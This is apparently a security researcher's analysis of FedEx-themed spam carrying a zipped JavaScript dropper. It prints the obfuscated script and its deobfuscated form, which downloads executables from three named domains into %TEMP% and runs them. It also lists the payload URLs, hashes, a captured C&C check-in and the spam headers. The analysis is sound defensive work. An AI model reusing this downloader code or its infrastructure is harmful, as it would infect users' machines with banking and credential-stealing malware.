Javascript infectors arriving via email spam

Recently we have been receiving multiple spam messages that had zip files attached with .js files inside. It tries to trick the user into opening the javascript files which would download and execute Trojans.

1

This is the contents of 00242116.doc.js which was in the zip file:

var stroke="5556515E0D0A020B240F08010D17170A01164A0B1603";function squ61() { return 'gs'; };  function squ214() { return '; } c'; };  function squ58() { return 'iro'; };  function squ142() { return 'e = '; };  function squ125() { return ' v'; };  function squ27() { return '; '; };  function squ144() { return '.writ'; };  function squ222() { return ' 1) b'; };  function squ156() { return '5000)'; };  function squ178() { return '1,0'; };  function squ223() { return 'reak;'; };  function squ197() { return '://"+'; };  function squ91() { return 'Acti'; };  function squ150() { return 'Body'; };  function squ113() { return 'ea'; };  function squ203() { return 'hp?r'; };  function squ202() { return 'nt.p'; };  function squ82() { return 'xe";'; };  function squ137() { return 'xa.'; };  function squ190() { return 'try '; };  function squ103() { return 'ystat'; };  function squ217() { return '(er)'; };  function squ184() { return '; }; '; };  function squ51() { return '; va'; };  function squ130() { return 'veXO'; };  function squ88() { return 'r x'; };  function squ81() { return '".e'; };  function squ155() { return ' > '; };  function squ224() { return ' } '; };  function squ36() { return 'i++)'; };  function squ182() { return ' (er'; };  function squ229() { return '; d'; };  function squ112() { return '(xo.r'; };  function squ67() { return 'from'; };  function squ172() { return '; '; };  function squ230() { return 'l(207'; };  function squ54() { return ' ws.E'; };  function squ200() { return '"/d'; };  function squ152() { return ' (xa.'; };  function squ38() { return ' va'; };  function squ117() { return ' == '; };  function squ92() { return 'veX'; };  function squ143() { return '1; xa'; };  function squ7() { return 'ar b'; };  function squ16() { return 'r d'; };  function squ136() { return '; '; };  function squ163() { return 'ti'; };  function squ86() { return ' = 0;'; };  function squ48() { return 't.'; };  function squ204() { return 'nd="+'; };  function squ157() { return ' {'; };  function squ90() { return 'new '; };  function squ154() { return 'ze'; };  function squ8() { return ' = "e'; };  function squ160() { return '1; x'; };  function squ141() { return 'typ'; };  function squ186() { return 'clo'; };  function squ107() { return ' = fu'; };  function squ173() { return 'tr'; };  function squ158() { return ' dn '; };  function squ29() { return '(v'; };  function squ168() { return 'sa'; };  function squ22() { return 'br".'; };  function squ179() { return '); '; };  function squ30() { return 'ar i='; };  function squ193() { return '("G'; };  function squ124() { return ') {'; };  function squ171() { return 'fn,2)'; };  function squ176() { return 'Run(f'; };  function squ98() { return 'TTP'; };  function squ12() { return 'es-eg'; };  function squ28() { return 'for '; };  function squ114() { return 'dy'; };  function squ6() { return ' v'; };  function squ165() { return ' = '; };  function squ24() { return 'it'; };  function squ57() { return 'dEnv'; };  function squ195() { return 'ht'; };  function squ105() { return 'an'; };  function squ133() { return 'ODB'; };  function squ159() { return '= '; };  function squ115() { return 'Sta'; };  function squ147() { return 'Resp'; };  function squ50() { return 'l")'; };  function squ78() { return '*1000'; };  function squ89() { return 'o = '; };  function squ167() { return ' xa.'; };  function squ2() { return 'ncti'; };  function squ194() { return 'ET","'; };  function squ212() { return '.sen'; };  function squ188() { return '(); }'; };  function squ201() { return 'ocume'; };  function squ108() { return 'nc'; };  function squ174() { return 'y { w'; };  function squ75() { return 'h.r'; };  function squ132() { return '("AD'; };  function squ192() { return 'open'; };  function squ52() { return 'r f'; };  function squ175() { return 's.'; };  function squ213() { return 'd()'; };  function squ161() { return 'a.'; };  function squ9() { return 'tqy.'; };  function squ37() { return ' {'; };  function squ153() { return 'si'; };  function squ34() { return 'ngth'; };  function squ83() { return ' v'; };  function squ59() { return 'nment'; };  function squ18() { return 'mon'; };  function squ70() { return 'de(92'; };  function squ220() { return '(dn '; };  function squ65() { return 'St'; };  function squ106() { return 'ge'; };  function squ134() { return '.Stre'; };  function squ146() { return 'xo.'; };  function squ77() { return 'm()'; };  function squ209() { return ' fa'; };  function squ131() { return 'bject'; };  function squ43() { return 'veXOb'; };  function squ23() { return 'spl'; };  function squ93() { return 'Obje'; };  function squ232() { return 'dl(6'; };  function squ198() { return 'b[i'; };  function squ49() { return 'Shel'; };  function squ116() { return 'te'; };  function squ32() { return '<b.'; };  function squ219() { return '; if '; };  function squ40() { return ' ='; };  function squ46() { return '"WSc'; };  function squ109() { return 'tion('; };  function squ191() { return '{ xo.'; };  function squ231() { return '2); '; };  function squ101() { return '.on'; };  function squ145() { return 'e('; };  function squ76() { return 'ando'; };  function squ45() { return 'ct('; };  function squ20() { return 'unes'; };  function squ17() { return 'jra'; };  function squ127() { return 'xa = '; };  function squ79() { return '00'; };  function squ196() { return 'tp'; };  var jg = '';  function squ169() { return 'veToF'; };  function squ227() { return '735'; };  function squ180() { return '} cat'; };  function squ33() { return 'le'; };  function squ42() { return ' Acti'; };  function squ100() { return 'xo'; };  function squ10() { return 'com'; };  function squ85() { return ' dn'; };  function squ99() { return '"); '; };  function squ56() { return 'an'; };  function squ128() { return 'new '; };  function squ39() { return 'r ws'; };  function squ21() { return '.com.'; };  function squ94() { return 'ct("'; };  function squ228() { return '1)'; };  function squ187() { return 'se'; };  function squ185() { return 'xa.'; };  function squ14() { return 'ers'; };  function squ11() { return ' l'; };  function squ162() { return 'posi'; };  function squ111() { return '{ if '; };  function squ199() { return ']+'; };  function squ97() { return 'XMLH'; };  function squ221() { return '=='; };  function squ215() { return 'at'; };  function squ205() { return 'fr+"&'; };  function squ73() { return 'und('; };  function squ80() { return '000)+'; };  function squ13() { return 'lanti'; };  function squ69() { return 'rCo'; };  function squ25() { return '(" '; };  function squ44() { return 'je'; };  function squ170() { return 'ile('; };  function squ211() { return ' xo'; };  function squ26() { return '")'; };  function squ126() { return 'ar '; };  function squ3() { return 'on'; };  function squ123() { return '200'; };  function squ207() { return '+st'; };  function squ71() { return ')+Ma'; };  function squ181() { return 'ch'; };  function squ41() { return ' new'; };  function squ66() { return 'ring.'; };  function squ135() { return 'am")'; };  function squ189() { return '; }; '; };  function squ149() { return 'se'; };  function squ60() { return 'Strin'; };  function squ63() { return 'MP%'; };  function squ74() { return 'Mat'; };  function squ122() { return '= '; };  function zo() { return 'e'; };  function squ47() { return 'rip'; };  function squ1() { return 'fu'; };  function squ4() { return ' dl(f'; };  function squ() { return 'val'; };  function squ183() { return ') {}'; };  function squ96() { return 'ML2.'; };  function squ210() { return 'lse);'; };  function squ64() { return '")+'; };  function squ164() { return 'on'; };  function squ84() { return 'ar'; };  function squ110() { return ') '; };  function squ19() { return 'ant'; };  function squ53() { return 'n ='; };  function squ118() { return '4 &&'; };  function squ208() { return 'roke,'; };  function squ206() { return 'id="'; };  function squ129() { return 'Acti'; };  function squ95() { return 'MSX'; };  function squ102() { return 'read'; };  function squ5() { return 'r) {'; };  function squ104() { return 'ech'; };  function squ121() { return 's ='; };  function squ120() { return 'statu'; };  function squ216() { return 'ch '; };  function squ68() { return 'Cha'; };  function squ87() { return ' va'; };  function squ233() { return '773);'; };  function squ72() { return 'th.ro'; };  function squ31() { return '0; i'; };  function squ140() { return 'xa.'; };  function squ225() { return '};'; };  function squ55() { return 'xp'; };  function squ15() { return '.f'; };  function squ119() { return ' xo.'; };  function squ218() { return ' {}'; };  function squ138() { return 'ope'; };  function squ151() { return '); if'; };  function squ139() { return 'n(); '; };  function squ177() { return 'n,'; };  function squ166() { return '0;'; };  function squ35() { return '; '; };  function squ226() { return ' dl('; };  function squ148() { return 'on'; };  function squ62() { return '("%TE'; }; for (var pqx=1; pqx<=233; pqx++) { jg += this['squ'+pqx](); } this[zo()+squ()](jg);

Luckily there is Wepawet which can analyze and simplify obfuscated javascripts. Here is the deobfuscated JS:

function dl(fr){
  var b = "etqy.com les-eglantiers.fr djramonantunes.com.br".split(" ");
  for (var i = 0; i < b.length; i ++ ){
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(
    Math.random() * 100000000) + ".exe";
    var dn = 0;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function (){
      if (xo.readyState == 4 && xo.status == 200){
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        if (xa.size > 5000){
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn, 2);
          try {
            ws.Run(fn, 1, 0);
          }
          catch (er){
          }
          ;
        }
        ;
        xa.close();
      }
      ;
    }
    ;
    try {
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false
      );
      xo.send();
    }
    catch (er){
    }
    ;
    if (dn == 1)break ;
  }
}
;
dl(7351);
dl(2072);
dl(6773);

Now that one is pretty easy to read. It will try to download 3 executables from following URLs, store them to %Temp% as random file name (being made out of a random number) and execute them.

http://etqy.com/document.php?rnd=7351&stroke=5556515E0D0A020B240F08010D17170A01164A0B1603
http://les-eglantiers.fr/document.php?rnd=7351&stroke=5556515E0D0A020B240F08010D17170A01164A0B1603
http://djramonantunes.com.br/document.php?rnd=7351&stroke=5556515E0D0A020B240F08010D17170A01164A0B1603

With the rnd value being replaced by 7351, 2072 and 6773.

During analysis one file was downloaded as “5a3a4bc2.gif” with MD5 E2ADEAA3E593A1783E5051E9935D81B3 SHA1 F9748B33515DA932CA8E6065325C7A22C2508DEB, which is a Windows executable. According to a comment on Malwr by Brad Berkemier this is a ZeuS file.

The check-in to the C&C server (see below), however, reveals “CRYPTED0” at the beginning which is known to be used by the Pony Downloader malware. Interestingly it is using “Windows 98” as user agent when checking in.

POST /cgi/open.php?AjDdUMhbDVn4StxDat8vR4WEk55GO4rhJCn HTTP/1.0
Host: poolsociety.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 192
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0.b..%nv..[.jm....$.v............AG.p.<l?.X5...V6.....y....+.......h*.d....7..+......C..7E..9.*.......O.....s2q.`?,....`.Y.kQ.......m[z..c._Z..g...Y& 3.....O..Q.2.........%`..B.i.(.#.mR

HTTP/1.1 200 OK
Date: Thu, 02 Jul 2015 18:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html

STATUS-IMPORT-OK

Source of the email spam

The full email header to that spam mail:

Return-path: 
Envelope-to: 1690mail1@mail04.in.easyname.com
Delivery-date: Thu, 02 Jul 2015 18:03:48 +0200
Received: from 50.97.79.218-static.reverse.softlayer.com ([50.97.79.218] helo=doit.thinkitbuilditllc.com)
	by mx.easyname.eu with esmtps (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256)
	(Exim 4.80)
	(envelope-from )
	id 1ZAgxj-0003Tv-8z
	for info@kleissner.org; Thu, 02 Jul 2015 18:03:46 +0200
Received: from nobody by doit.thinkitbuilditllc.com with local (Exim 4.85)
	(envelope-from )
	id 1ZAgxb-0000nG-E6
	for info@kleissner.org; Thu, 02 Jul 2015 18:03:35 +0200
To: info@kleissner.org
Subject: Courier was unable to deliver the parcel, ID00242116
X-PHP-Script: fm.cyberball.1two7.com/post.php for 80.70.5.26
Date: Thu, 2 Jul 2015 18:03:35 +0200
From: "FedEx Standard Overnight" 
Reply-To: "FedEx Standard Overnight" 
Message-ID: 
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="b1_b7c1ceb8ae8d3d20105cf2b9940a7f5b"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - doit.thinkitbuilditllc.com
X-AntiAbuse: Original Domain - kleissner.org
X-AntiAbuse: Originator/Caller UID/GID - [99 500] / [47 12]
X-AntiAbuse: Sender Address Domain - doit.thinkitbuilditllc.com
X-Get-Message-Sender-Via: doit.thinkitbuilditllc.com: uid via acl_c_vhost_owner from authenticated_id: nobody from /only user confirmed/virtual account not confirmed
X-Source: 
X-Source-Args: /usr/local/apache/bin/httpd -k start -DSSL 
X-Source-Dir: 1two7.com:/public_html/cyberball/fm
X-ACL-Warn: X-DNSBL-JUNKEMAILFILTER
X-ACL-Warn: X-DNSBL-BARRACUDACENTRAL

You can see there clearly “X-PHP-Script: fm.cyberball.1two7.com/post.php for 80.70.5.26” – thanks to default configurations this logs the origin of the PHP script which sent the email. Directory listing is enabled for that URL, however, it does not reveal much other than the post.php and legitimate other files.

Directory Listing